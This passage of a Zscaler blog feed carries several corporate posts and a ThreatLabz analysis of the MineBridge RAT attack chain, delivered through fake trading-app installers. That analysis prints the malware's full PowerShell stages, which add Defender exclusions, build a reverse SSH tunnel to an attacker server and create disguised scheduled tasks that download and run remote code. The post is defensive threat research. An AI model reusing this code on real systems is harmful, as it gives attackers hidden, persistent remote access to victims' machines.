follow, but we will have directly changed people’s lives. That is the legacy I strive for and is the basis of the platform we’re building and refining at Zscaler. Zscaler is growing at hyperspeed. With the broad and lasting adoption of zero-trust and working-from-anywhere, we are the entity to guide companies into the digital future and secure their cloud transformation. Our Zero Trust Exchange is a purpose-built and cloud-native, cohesive platform and is truly the only one of its kind. By believing in our mission and disruptive technology, we find and nurture the greatest minds to continue innovating and moving the company forward. When asked about the reasons why she is excited about working at Zscaler, Dawn Ambrose, Channel Account Manager at Zscaler, explained: First, it’s the technology. Zscaler is the right technology at the right time. Second, it’s the people. People truly matter. Whether you’re early in your career or you have many years under your belt, Zscaler will stretch and teach you new ways of doing things that will stay with you long after your tenure here. And last but not least, it’s the opportunity. Where else can you go to work and help address a 72 billion dollar market just over the next two to three years? It’s incredible. If you’re looking for a life-changing opportunity, want to work with a platform built for continuously evolving and learning, and grow alongside a leadership team committed to your success, explore our open opportunities. Additionally, listen to the Podcast Episode and listen to my webinar on what it means to work at Zscaler, why taking risks is essential, and how our company truly makes a difference in our customers’ lives and our people. Mon, 21 Jun 2021 12:59:55 -0700 Dali Rajic Demystifying the full attack chain of MineBridge RAT Introduction In March 2021, threat actors started distributing MineBridge RAT with an updated distribution mechanism. Morphisec blogged about the partial attack chain of this new attack but they could not find the origin or initial stages of the attack chain. In May 2021, Zscaler ThreatLabz was able to uncover all the components of this complex multi-stage attack chain which have never before been documented in their entirety in the public domain. We've blogged about MineBridge RAT before, in February 2021. This is a RAT (remote access trojan) that misuses the remote desktop software TeamViewer for DLL side-loading, enabling the threat actor to take a wide array of remote follow-on actions such as spying on users or deploying additional malware. It was first discovered in January 2020 targeting financial services organizations. We discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries which masquerade as trading applications. The different stages in this sophisticated attack chain leverage Windows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and shortened URLs that ultimately lead to the MineBridge RAT execution. Attack flow Figure 1 below illustrates the full end-to-end attack chain. Figure 1: Complete end-to-end attack chain used to deliver MineBridge RAT Technical analysis On April 9th, 2021, threat actors registered the domain "tradingview[.]cyou," a look-alike of the legitimate website "tradingview[.]com." A download link for the malicious TradingView Desktop application was placed on the homepage. The official TradingView desktop application was launched by in December 2020 for the first time. This indicates that the threat actor is quick at identifying such opportunities to leverage them in their attack chain. Within 4 months of launch of the new official trading application, the threat actor registered a new domain to distribute the malicious version of application. Similar to this, other trading applications and bots often used by stock and crypto currency traders have also been abused by the threat actor. The complete list of file hashes is included in the IOCs section. Figure 2 and 3 below show the webpages corresponding to malicious and legitimate domains. Figure 2: Webpage of the malicious website Figure 3: Webpage of the legitimate website The download link (hxxps://tradingview[.]cyou/tradeview.php) on the attacker-controlled domain leads to the download of a malicious Windows Installer. Note: We noticed that the download URL responds with the malicious Windows Installer only if the user-agent string in the HTTP request headers corresponds to Windows 10 OS. For the purpose of technical analysis, we will look at the Windows Installer with MD5 hash: 4284ee1eef9dd7f020f5002d63def278 The installer is an Inno package which masquerades as a TradingView Desktop application and is digitally signed by YUNIVELL, LLC. The thumbprint of the digital signature is: 93e9d0b1ea812672b825d7c6812d435cca9fff99 Figure 4 below shows the content of the Inno package Figure 4: Contents of the Inno setup package By pivoting on this thumbprint, we identified a few more trading applications which are used to spread MineBridge RAT as well. The hashes of these binaries are also mentioned in the Indicators of compromise (IOCs) section. Upon execution, this installer shows a GUI (Graphical User Interface) which spoofs a TradingView application while it performs malicious activities in the background. To start malicious activities, the installer executes two PowerShell command lines which we have referred to as Stage-1 PowerShell and Stage-2 PowerShell. The operations performed by these are explained in detail in the following sections. Note: The complete code for Stage-1 PowerShell and Stage-2 PowerShell is included in Appendix I [+] Stage-1 PowerShell Figure 5 below shows the relevant code section of Stage-1 PowerShell script. Figure 5: Stage-1 PowerShell code Below are the main operations performed by it. 1. Changes the current directory to: "$env:programdata\ssh\" 2. Fetches SSHD config from the shortened URL: (redirects to: and writes it to the file: sshd_config 3. Adds the OpenSSH.Server Windows capability and starts the sshd service. Sets the startup type to Automatic. 4. Changes directory to the path: "$env:userprofile" and creates the ".ssh" directory. 5. Fetches the SSH keys from the URL: (redirects to: and writes them to the file: authorized_keys 6. Fetches the RSA private keys from the URL: (redirects to: and writes them to the file: tun_id_rsa 7. Downloads the SSH client binary from the URL: (redirects to: and writes it to: ssh.exe 8. Executes the following command to set up a reverse SSH tunnel from the victim’s machine at port 109 to the attacker’s server at port 32672. -N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i "'+$env:userprofile+'\.ssh\tun_id_rsa" -o "StrictHostKeyChecking=no" -o "ExitOnForwardFailure=yes" -o "ServerAliveInterval=10" -o "ServerAliveCountMax=10"'; Here, $RemoteSrv: $RemotePort: 32672 Note: Reverse SSH tunnelling helps the threat actor to bypass firewall rules since outbound connection requests are generally not blocked. 9. Creates a new scheduled task with the name, "OneDrive Sync" which executes the above command line upon Logon, and once every 20 minutes. [+] Stage-2 PowerShell Figure 6 below shows the relevant code section of Stage-2 PowerShell script. Figure 6: Stage-2 PowerShell code The PowerShell script performs the following operations: 1. Creates a scheduled task with the name, "Google Disk Sync" which runs twice every week and executes the following code using PowerShell $b="https://"; $c=""; $d="/9nOFUuK"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex; $b="https://"; $c=""; $d="/HxPcxuH"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex; This code performs following operations: ● Downloads and executes Stage-3 PowerShell code from: cutt[.]ly/9nOFUuK [redirects to: https://simpleclub[.]website/upd/?t=psns] which ultimately leads to NetSupport client execution. ● Downloads and executes Stage-4 PowerShell code from: cutt[.]ly/HxPcxuH [redirects to: https://simpleclub[.]site/upd/?t=pstv] which ultimately leads to MineBridge RAT execution. 2. Creates a scheduled task with the name, "Google Photo Sync" which runs twice every week and executes the following PowerShell command line: $b="https://"; $c=""; $d="/9nOFUuK"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex; This again downloads and executes the Stage-3 PowerShell code from: https://cutt[.]ly/9nOFUuK [redirects to: https://simpleclub[.]website/upd/?t=psns] Note: We have not detailed the Stage-3 PowerShell and Stage-4 PowerShell in this blog since the details for these two are already covered in the Morphisec blog. Zscaler Cloud Sandbox report Figure 7 below shows the Zscaler cloud sandbox report for MineBridge RAT DLL. Figure 7: Cloud sandbox report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. PS.Downloader.MINEBRIDGE Win32.Backdoor.MINEBRIDGE MITRE ATT&CK TTP Mapping ID Tactic Technique T1566 Phishing Attacker hosted fake websites leading to malicious file download T1204.002 User Execution: Malicious File User executes the downloaded file T1059.001 Command and Scripting Interpreter: PowerShell Uses PowerShell in multiple stages to download and execute malicious payloads T1547.001 Registry Run Keys / Startup Folder Creates LNK file in the startup folder for payload execution T1053.005 Scheduled Task/Job: Scheduled Task Creates scheduled task to execute PowerShell commands which further downloads and executes PowerShell scripts T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payloads T1036.004 Masquerading: Masquerade Task or Service Scheduled tasks are created with name masquerading Google and OneDrive T1036.005 Masquerading: Match Legitimate Name or Location Dropped LNK file for persistence masquerades Windows Defender T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed in layers T1574.002 Hijack Execution Flow: DLL Side-Loading Uses legit TeamViewer binary with dll-side loading vulnerability T1056.002 Input Capture: GUI Input Capture Captures TeamViewer generated UsedID and Password by hooking GUI APIs T1057 Process Discovery Verifies the name of parent process T1082 System Information Discovery Gathers system OS version info T1033 System Owner/User Discovery Gathers currently logged in Username T1572 Protocol Tunneling Creates Reverse SSH tunnel T1071.001 Application Layer Protocol:Web Protocols Uses https for network communication T1041 Exfiltration Over C2 Channel Data is exfiltrated using existing C2 channel Indicators of compromise (IOCs) [+] Hashes MD5 FileName Type 4284ee1eef9dd7f020f5002d63def278 TradingView.exe Installer 68a010a3d0d25cfa13933199511ed897 Polarr_Setup (2).exe Installer ffcd63dc98e64afbfea8718b747963d7 Bitcoin_Trade.exe Installer 3281f3b30fb8f3c69b18cc7aadfdf697 Arbitrage_Bot.exe Installer 796e091b18112e223749972c3f0888db Bitcoin_Trade.exe Installer b14632304a7543752fbf2e3b7c0eca59 msi.tiff (MineBridge RAT) Dll [+] C2 domains Component Domain Phishing website tradingview[.]cyou tradingview[.]cloud tradingview[.]digital tradingview[.]life PowerShell payloads cloud-check[.]website simpleclub[.]website simpledomen[.]website simpleclub[.]site Reverse SSH tunnel 86.106.181[.]183:32672 NetSupport client update-system[.]cn updatesystem[.]website MineBridge RAT ninjakick[.]club polarrsearch[.]xyz rogaikopyta[.]xyz utkailipa[.]xyz 5tvstar[.]cn goldendragon888[.]cn [+] Windows Installer signer details Signer name: YUNIVELL, LLC Thumbprint: 93E9D0B1EA812672B825D7C6812D435CCA9FFF99 [+] Scheduled tasks name OneDrive sync Google Disk Sync Google Photo Sync Appendix I [+] Stage-1 PowerShell Add-MpPreference -ExclusionPath $env:userprofile; $LocalPort = 109;cd "$env:programdata\ssh\"; $HomeURL = ''; $FileCfg = 'sshd_config'; $LinkCfg = $HomeURL; $LinkCfg += 'UxtdKtn'; Invoke-WebRequest -Uri $LinkCfg -OutFile $FileCfg; Add-WindowsCapability -Online -Name OpenSSH.Server~~~~;New-NetFirewallRule -Name sshd -DisplayName 'Security Updater' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort $LocalPort; Start-Service sshd;Set-Service -Name sshd -StartupType 'Automatic'; $RemotePort = 32672; $RemoteSrv = '';$TaskName = "OneDrive Sync"; $System32 = $env:systemroot+'\system32'; cd "$env:userprofile";mkdir '.ssh';cd '.ssh'; $HomeURL = ''; $LinkKey = $HomeURL+'Zxtd1Kl'; $FileKey = $(get-location).Path+'\authorized_keys'; if(![System.IO.File]::Exists($FileKey)){Invoke-WebRequest -Uri $LinkKey -OutFile $FileKey;} $LinkRSA = $HomeURL+'yxtdOo3'; $FileRSA = $(get-location).Path+'\tun_id_rsa'; if(![System.IO.File]::Exists($FileRSA)){Invoke-WebRequest -Uri $LinkRSA -OutFile $FileRSA;} icacls.exe $FileRSA /reset;icacls.exe $FileRSA /grant:r "$($env:username):(r)";icacls.exe $FileRSA /inheritance:r; $LinkSSH = $HomeURL+'ubfAKPb'; $SSH="$env:userprofile\.ssh";if($env:path -ne $SSH){$env:path += ";$SSH";setx PATH "$env:path;$SSH";echo $env:path;} $SSH+="\ssh.exe"; if(![System.IO.File]::Exists($SSH)){Invoke-WebRequest -Uri $LinkSSH -OutFile $SSH -UseBasicPArsing;} $SSH="ssh.exe"; $Arguments = '-N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i "'+$env:userprofile+'\.ssh\tun_id_rsa" -o "StrictHostKeyChecking=no" -o "ExitOnForwardFailure=yes" -o "ServerAliveInterval=10" -o "ServerAliveCountMax=10"'; $ActionX = New-ScheduledTaskAction -Execute $SSH -Argument $Arguments; $PrincipalX = New-ScheduledTaskPrincipal -UserID $env:UserName -LogonType S4U -RunLevel Limited; $TriggerX = New-ScheduledTaskTrigger -AtLogOn; $TriggerC = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 20); $task = New-ScheduledTask -Action $ActionX -Principal $PrincipalX -Trigger $TriggerX,$TriggerC; if($(Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue).TaskName -eq $TaskName){Unregister-ScheduledTask -TaskName $TaskName -Confirm:$False} Register-ScheduledTask $TaskName -InputObject $task;Start-ScheduledTask -TaskName $TaskName; [+] Stage-2 PowerShell Add-MpPreference -ExclusionPath $env:userprofile;$T = Get-Date; $D1 = $T.DayOfWeek; $D2 = $T.AddDays(3); $D2 = $D2.DayOfWeek; $T1 = $T.AddMinutes(8); $TR = New-ScheduledTaskTrigger -At $T1 -Weekly -DaysOfWeek $D1,$D2; $A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ep bypass -w hidden -nop -enc JABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwA5AG4ATwBGAFUAdQBLACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AAoAJABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwBIAHgAUABjAHgAdQBIACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AA=="; Register-ScheduledTask -TaskName "Google Disk Sync" -Trigger $TR -User $env:UserName -Action $A -RunLevel Highest -Force; $T2 = $T.AddMinutes(12); $TR2 = New-ScheduledTaskTrigger -At $T2 -Weekly -DaysOfWeek $D1,$D2; $A2 = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ep bypass -w hidden -nop -enc JABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwA5AG4ATwBGAFUAdQBLACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AA=="; Register-ScheduledTask -TaskName "Google Photo Sync" -Trigger $TR2 -User $env:UserName -Action $A2 -RunLevel Highest -Force; Thu, 24 Jun 2021 11:03:30 -0700 Sudeep Singh Revolutionize DEM with 360-Degree Monitoring for the Cloud Era Imagine watching an action movie with only one fixed camera angle. It would be an incredibly frustrating experience. Not only would your understanding of scenes be limited, but you would need to extrapolate the storyline from incomplete data. The same can be said for some digital experience monitoring (DEM) solutions. The efficacy of any monitoring solution lies in how many different angles the solution uses to instrument and collect data. Most monitoring solutions have single points of instrumentation: an agent installed on a workload or the end user’s device. Some solutions are hardware-based, using appliances in a data center to collect data. The problem with the “single angle” solutions above is you must place a “camera” at the endpoint or workload to instrument it. And to do that, you need direct ownership of those elements to monitor data from that perspective. In highly distributed environments, where users can be anywhere, and applications are hosted in cloud infrastructure, and there isn’t direct ownership of the infrastructure, this is a significant limitation. Enter Zscaler Digital Experience (ZDX). ZDX is Zscaler’s digital experience monitoring solution that leverages Zscaler’s extensive global footprint of 150 data centers—Zscaler’s Zero Trust Exchange—that form the world’s largest security cloud (these internet-edge data centers process over 160 billion transactions a day). Thus, the ZDX solution is built as a monitoring overlay directly onto the existing Zscaler Internet Access and Zscaler Private Access platforms. It leverages the same Zscaler Client Connector agent that provides cyberthreat protection, data protection, and zero trust remote access. There are approximately 20 million Client Connector agents deployed among Zscaler customers worldwide. ZDX is unique because it uses these widely deployed agents and the global Zero Trust Exchange as 360-degree instrumentation points (as seen in Figure 1). Figure 1: Zscaler’s Zero Trust Exchange with points of telemetry They act as unique telemetry sources, providing visibility into the end-user performance from multiple camera angles—from the end-user’s perspective looking out and from the cloud’s perspective looking in. It’s a little like the 360-degree camera work from The Matrix. Figure 2: A 360-degree view of the action This 360-degree telemetry affords two unique advantages: Ubiquitous performance monitoring at scale. ZDX can regularly probe the performance of your entire employee base by accessing critical internal and external applications (typically every five minutes). While having this visibility and data is incredible, you might wonder about the impact these transactions have on your applications. The good news is that there is minimal impact due to Zscaler’s inline proxy architecture. Web probe traffic is proxied and cached by the Zero Trust Exchange, so there is never a one-to-one ratio of endpoints to web hits but a significantly reduced one-to-many ratio (see Figure 3). Figure 3: Cached web probe traffic 360 Degree CloudPath. CloudPath provides path visualization and telemetry of the user’s traffic path, leveraging Client Connector from the endpoint to its egress to the destination over the Zscaler cloud. This includes the tunnel through a ZIA or ZPA Public Service Edge. So far, so good, but what makes CloudPath special? The Zscaler Zero Trust Exchange provides ZDX with a unique path analysis from multiple angles. It measures the perspective from the end user’s outbound path, the Zscaler Zero Trust Exchange inbound, and Zscaler Zero Trust Exchange to the application (see Figure 4). Figure 4: CloudPath stitches three separate traces into one All of these views are stitched together for maximum granularity and accuracy that is proxy-aware. This results in highly detailed end-to-end path analysis to pinpoint where performance issues are coming from (see Figure 5) that other solutions cannot replicate. Figure 5: A proxy-aware granular view A Digital Experience Monitoring solution is a must-have in the work-from-anywhere world. Selecting a solution means considering the unique advantages afforded by an inline proxy architecture. When the power of your monitoring solution depends on instrumentation that shows you every angle of the action, having the Zero Trust Exchange footprint at your disposal makes all the difference. Check out Zscaler’s ZDX solution, and reach out for a solution expert to discuss how ZDX can help you monitor all the action from every angle. Tue, 22 Jun 2021 08:00:01 -0700 Sanjit Ganguli Introducing New Partner Certifications and Learning Formats! Introducing New Partner Certifications Zscaler is pleased to announce new pre-sales certifications featuring all-new content and interactive learning opportunities. These courses were specifically designed to give partners the chance to roll up their sleeves and uncover new ways to grow their business with Zscaler. At Zscaler, we believe our partners are crucial to our success. We recognize we must work in conjunction with our partners to spread the word about the possibilities of adopting a zero trust security model. Zscaler Certified Associate (ZCA) Zscaler Certified Associate overviews the goals and vision of Zscaler, including what we do, the value we offer customers, and our mission for future network and security transformation. Partners will learn how Zscaler is uniquely positioned to disrupt the status quo of hub-and-spoke network security and how to join us on the incredible journey. ZCA serves as a prerequisite for both the Zscaler Certified Sales Professional (ZCSP) and the Zscaler Certified Sales Engineer (ZCSE) certifications and replaces the existing Zscaler Certified Sales Specialist (ZCSS) certification. Zscaler Certified Sales Professional (ZCSP) Zscaler Certified Sales Professional is designed to familiarize partner sellers with how to best position Zscaler as the market’s leading network and cloud security solution. In this certification, partners will learn how to identify and qualify opportunities as well as the technical integrations we have in place to help you position Zscaler as part of a holistic solution. Partners will also dive into the four core product areas for the Zero Trust Exchange platform. The new ZCSP certification is valid for two years upon completion. Zscaler Certified Sales Engineer (ZCSE) This certification is built for those in pre-sales technical roles, specifically designed to get participants up to speed on how to best showcase Zscaler’s technical value and differentiation. In this certification, partners will take a deep dive into Zscaler’s core product offerings to understand the key capabilities of the zero trust platform and how customers can realize the benefits in their unique environments. Participants will also catch a glimpse into a security administrator’s experience, including policies, reporting tools, technical integrations, and the end-user experience. The new ZCSE certification is valid for two years upon completion. What are the Benefits of Becoming Zscaler Certified? Zscaler certifications are designed to arm partners with the most up-to-date information about our products, strategies, and thought leadership so they can effectively communicate the value of our end-to-end zero trust security platform. By becoming Zscaler certified, partners will increase their credibility with customers by helping them accelerate their highest priority IT initiatives, all while reducing cost and simplifying their environments. With Zscaler, partners can expect to expand their book of business by providing the holistic and integrated solution packages their customers want and need. If you are a partner looking to enroll in Zscaler Training & Certifications, log in to our Partner Portal at and click on the Enablement tab. Tue, 22 Jun 2021 07:00:01 -0700 Rick Kickert We’re Pleased to Announce our 2021 Partner Award Winners This year we’re celebrating our very first Zscaler Partner Awards, honoring our “zero trust heroes” who’ve gone above and beyond in their partnership with Zscaler to help our mutual customers embrace digital transformation. Who’ll be taking home the trophies? Let’s find out! Americas Partner of the Year Like all of the awards announced, selecting a winner is the result of in-depth deliberation. With that said, the Americas Partner of the Year winner leads with transformation and leverages this principle to build strong customer relationships with advisory consulting. This partner also is being recognized for approaching zero trust with a focus on identity-based security policies rather than network. Therefore, we’re happy to announce that OPTIV is the Zscaler Americas Partner of the Year. APJ Partner of the Year Our APJ Partner of the Year winner signed a global contract with Zscaler in 2018, and the level of executive and field engagement continues to be outstanding, significantly contributing to Zscaler’s reach and success in this region. With the highest number of Zscaler certifications globally, this partner delivers strong partner-sourced performance in Japan by landing both domestic and global accounts. Our APJ Partner of the Year is NTT Communications Corporation. EMEA Partner of the Year Our EMEA Partner of the Year was entirely self-sufficient from pipeline generation through proof-of-value. By investing in Zscaler Certifications to up-level their technical expertise, and by hosting quarterly webinar campaigns yielding an average of ten new leads per quarter, Avantec AG has been selected as our EMEA Partner of the Year. Public Sector Partner of the Year With a focus on new business meetings and consistently executing interlocks and integrated field engagements, our Public Sector Partner of the Year consistently exceeds business objectives—especially when delivering Zscaler services to key strategic accounts. Our Public Sector Partner of the Year is ThunderCat Technology. Global Solution Integrator Partner of the Year As one of our most prominent end-user customers, this partner leverages ZIA and ZPA to enable their employees to work securely from anywhere. In addition, Zscaler is this partner’s exclusive GTM partner for web security and zero trust, and closed several large new logos across several verticals last year. As an outstanding partner in Central Europe with expansion plans to other regions, Zscaler’s Global System Integrator Partner of the Year is Tata Consulting Services. Services Partner of the Year Over the last year, this partner has subcontracted and delivered on a large number of projects and offers a robust set of U.S. federal and commercial expertise. More notable is that most of this partner’s deployments are completed in 90 days or less, with consistently high customer satisfaction ratings. Our Services Partner of the Year is Ridge IT. Service Provider Partner of the Year This year’s winner is our second-largest global partner for new sourced business, growing even more in 2020 and delivering balanced performance across all regions. This partner also landed two of our five largest sourced ZIA deals. Our Service Provider Partner of the Year is Verizon. Zero Trust Technology Partner of the Year Microsoft has been out in front of the industry in its call for the adoption of zero trust to enable the modern workplace, close security gaps, and accelerate digital transformation. It is closely aligned with Zscaler in the belief that zero trust isn’t a single solution, but rather a strategy that should extend across a company’s digital estate. Microsoft is on its own zero trust journey, applying the principles of least-privileged access, explicit authentication, and the prevention of lateral movement across its ecosystem, while educating customers about these key requirements to help them improve their security postures as they move to the cloud and support a mobile workforce. Congratulations to Microsoft, our Zero Trust Technology Partner of the Year. The Go-to-Market Technology Partner of the Year One of our top GTM Technology Partners, this partner helps us deliver incredible value to large global organizations. This award recognizes our relentless focus on securing work beyond the perimeter and co-developed innovations, enabling our customers to seamlessly and securely shift to remote and hybrid work. Congratulations to our Go-to-Market Partner of the Year, CrowdStrike. Customer-Centric Technology Partner of the Year This award recognizes our shared commitment to customer obsession and improving customer experiences, which is reimagining how businesses can drive successful outcomes and reduce costs, while balancing security with user experience. Congratulations to the team at AWS. Congratulations to all of our winners! Thank you for your continued partnership and driving success with our joint customers. For more information on our Summit partner program visit and watch the replay of Partner Summit at Zenith Live. Mon, 21 Jun 2021 08:40:53 -0700 Punit Minocha Blocking the Unknown Threat with Machine Learning This post also appeared on LinkedIn. Finding the needle in the haystack is difficult enough as it is. Finding the unknown threat in 160 billion transactions a day is like trying to find a single needle in a million haystacks...and you don’t know what a needle looks like. I am glad to blog about the intriguing work my Machine Learning and AI teammates have done along with our amazing colleagues from the Security Research, Engineering, and PM team. Thanks to the team effort that made this article possible! Most security professionals are quite capable of stopping known threats: Is the signal recognized? Block it. But how do you block something you haven’t seen before? Identifying threats in inbound and outbound traffic is like trying to find a needle in a proverbial haystack. It’s challenging, but it’s something Zscaler has been doing for more than a decade. Every day, Zscaler enables and inspects more than 160 billion transactions. Thanks to more than 175,000 daily new security updates, about 100 million threats are detected every day for our customers. Among them, some are known threats and some are unknown threats. Everything to know about unknown threats Unknown threats are threats that haven’t been documented or detected before. They arrive in a system without a known identifiable signal such as an IoC (Indicator of Compromise) or signature. Sometimes they are variations of known threats — say, a variant of a well-known ransomware strain — and sometimes they are brand new, previously unseen, or original threats. Blocking unknown threats requires an innovative approach to security. The Zscaler Zero Trust Exchange employs innovations such as Cloud Sandbox (CSB) and Cloud Browser Isolation (CBI) services to sequester the unknown bad. On top of that, the Zscaler ML/AI team has been collaborating with our security research and security engineering team closely to develop advanced technology to complement the existing CSB and CBI solutions and combat unknown threats more easily, effectively, and efficiently. Without a signal to act upon, unknown threats are understandably more difficult to block. We have to correlate and stitch together many other signals from transactions over sometimes a long period. It can be difficult to put into practice, especially with such massive data volumes. We need to transform such an NP-hard like problem into something more actionable and more manageable without compromising the unknown threat detection. At Zscaler, we started leveraging Machine Learning and AI technology to filter the petabytes of data, leaving us with a much smaller volume of data so that our deeper analysis (some based on the tried and true conventional technology and some based on the AI model) of the transactions is feasible, practical, and effective. Zscaler Machine Learning and AI tools in practice Let’s look at some examples. The first example is with unknown web-page categorization by AI/ML. At Zscaler, we use AI to categorize an unknown page to be “Education”, “Weapons/Bombs”, or whatever category. We can do this even if we have never seen and labeled the page before. This smart capability — honed from complex algorithmic AI logic running behind the scenes — enables us to figure out some of the “good” and “bad” sites simply by using our proprietary categorization model. The second example is with unknown web-page risk analysis by AI/ML. There is a subtle difference here as we do risk assessment more than the page categorization here. In fact, our Zscaler cloud service already scores web page destinations in production for years and now AI/ML can make that quantification even better and stronger via a domain reputation model. Let's look at this example in detail below. The ML-based domain reputation model We’ve created an ML-based domain reputation model that pre-filters outbound domains which will then make a downstream threat-detection module (e.g., a command and control model) more practical and effective. Users visit many domains a day. If a domain is known to be bad (because it was associated with a known threat, for example) then it will be blocked. But there will still be unknown domains, and even though they might represent a small percentage of the total, the scale is still huge. Zscaler traffic includes visits to many millions of such domains a day. In this case, ML aids threat detection (including but not limited to phishing and command and control detection) by identifying if a given domain is suspicious or not. This pre-filtering model or technique reduces the unknown domain list to be manageable for further advanced analysis. In our setup, the ML-based domain reputation model returns a value between 0 and 100 that reflects the likelihood of a good domain. The lower the score, the more likely the domain is bad. Figure 1. Zscaler patent-pending domain reputation AI/ML model. As shown in Figure 1, the total domain reputation score is calculated from its sub-component scores. A machine learning method is used to automatically adjust the weights of these scores to make sure that the final reputation scores follow a Gaussian distribution. (See Figure 2 below.) This allows us to set a threshold to control the fraction of “suspicious” domains to be sent for further analysis. This patent-pending ML model enables us to keep “suspicious” domain volume low enough to be practically and deeply analyzed without compromise to threat posture. The outcome is that we can filter out clean transactions effectively and focus our analytical energy on only the suspicious. Figure 2 below shows sample output based on recent real traffic plus test data sets including the recent SolarWind supply-chain attack domains. Figure 2. Frequency distribution of the domain reputation AI model scores (blue bars) and its fitted Gaussian model (orange curve). Domains to the left of the red line are considered “suspicious” and will be passed to the downstream command and control detection AI model. As it turned out in the lab test in Figure 2 above, our model assessed twelve (12) "SolarWind attack" related domains and classified all of them to be “suspicious” correctly. From here, we then ran a command-and-control detection model (I will discuss it in a future blog) on all of the suspicious domains. We discovered real unknown threats and here is one example that was added to the Zscaler threat database and blocked around the world: Figure 3. One malicious domain found in a downstream Zscaler command-and-control detection AI/ML model. ML-based domain reputation analysis enables Zscaler to detect and block unknown threats more efficiently and effectively Finding the needle in the haystack is difficult enough as it is due to the scale and speed requirements. Finding the unknown threat in massive volumes of data traffic is like trying to find a single needle in a million haystacks...and you don’t know what a needle looks like. Every day, more and more unknown threats appear, introducing new risks to modern enterprises. The Zscaler Machine Learning and AI team’s advanced technology -- including the AI/ML-based URL categorization and AI/ML-based domain reputation scoring referenced in this blog -- mitigates the risk of unknown threats. And in the milliseconds it takes for those models to identify an unknown threat as an actual threat to be blocked, security improves for every single Zscaler customer. For more on Zscaler Machine Learning and AI technology blocking unknown threats in practice, watch my presentation from the recent Virtual Zscaler CXO Summit. Fri, 18 Jun 2021 08:00:01 -0700 Howie Xu Zenith Live EMEA is a Wrap! Another Zenith Live is in the books, and we’re proud to say this was our biggest event and arguably our best one yet. While we wish we could have gathered together in person, the sense of community, engagement, and enthusiasm displayed by attendees, customers, partners, and speakers brought this event together. Two days of real-life transformation stories, keynotes, panels, demos, and training leave us all with a lot to unpack and take with us as we move forward together on our transformation journeys. With that in mind, we wanted to share a quick summary of this year’s Zenith Live so you can catch up on anything you may have missed. (Many sessions are available on demand here.) Day one highlights Zscaler CEO Jay Chaudhry opened the conference by congratulating the entire IT community for its heroic work last year, keeping their organizations operating and employees working, while highlighting how the pandemic accelerated the need for a modern digital infrastructure based on zero trust. In Jay's words, "IT has proven time and again its resilience in not just adapting to change but being the catalyst for change." He explained how the Zscaler Zero Trust Exchange, our cloud-native platform that powers all Zscaler services, helped many customers through the transition to work from home and is now enabling new capabilities. The Zero Trust Exchange is helping customers accelerate transformation in three ways: by modernizing the workplace to enable work from anywhere, by eliminating the attack surface to reduce risk, and by transforming security so that it can be everywhere, blocking cyberattacks, preventing data loss, and eliminating lateral threat movement. You can watch Jay’s keynote and many of the other sessions on demand: Following his opening remarks, Jay was joined by Karl Hoods, Chief Digital Information Officer at the UK’s department for business, energy, and industrial strategy, for the CIO Perspective Panel. They discussed how CIOs are tasked with transforming all aspects of the business and are now empowered to lead a range of initiatives. Karl also explained some of the challenges his organization faced when tasked with quickly and securely providing efficient work-from-anywhere experiences. In another illuminating discussion, Gulay Stelzmullner of Allianz Technology, Petek Ergul of HSBC, and Alissa Choong of Shell joined Zscaler EVP Kavitha Mariappan for the Women in IT panel. In this fireside chat, they discussed what truly lies beyond C-level attainment, including creating and mentoring tech leaders, championing diversity and inclusion, and making an industry-wide impact. All four leaders shared personal stories of how they used their conviction to succeed in the transformative roles they hold today. Day two highlights Day two opened with the second installment of “Innovating at the Speed of Cloud," with Amit Sinha, Steve House, and Tony Paterra describing enhancements across the Zscaler platform. Some of them included inline and out-of-band CASB for better data protection and compliance. Security innovations include the first zero trust solution to include active defense, an exciting approach to cybercrime prevention, and we have expanded Cloud Browser Isolation capabilities in both the ZIA and ZPA services to isolate users and devices from potentially risky content. Customers provided powerful insights The morning continued with a CISO panel featuring Andrew Vautier of Accenture and Angelique Grado of Technip FMC, who joined Zscaler’s Yogi Chandiramani to address how today’s new hybrid work model may continue indefinitely, and what this means for security teams. In an enlightening discussion, the CISO panel cited the alignment of security and business objectives as a must—in other words, the role of the CISO needs to evolve to straddle both the technical and operational aspects of leveraging zero trust to support new business initiatives and deliver tangible success. The conversation around elevating IT as a key business enabler continued with the CTO panel. An underlying theme of this year's Zenith Live was embracing zero trust to improve business agility and resiliency to support the needs of today's hybrid workforces. According to our expert panel, including 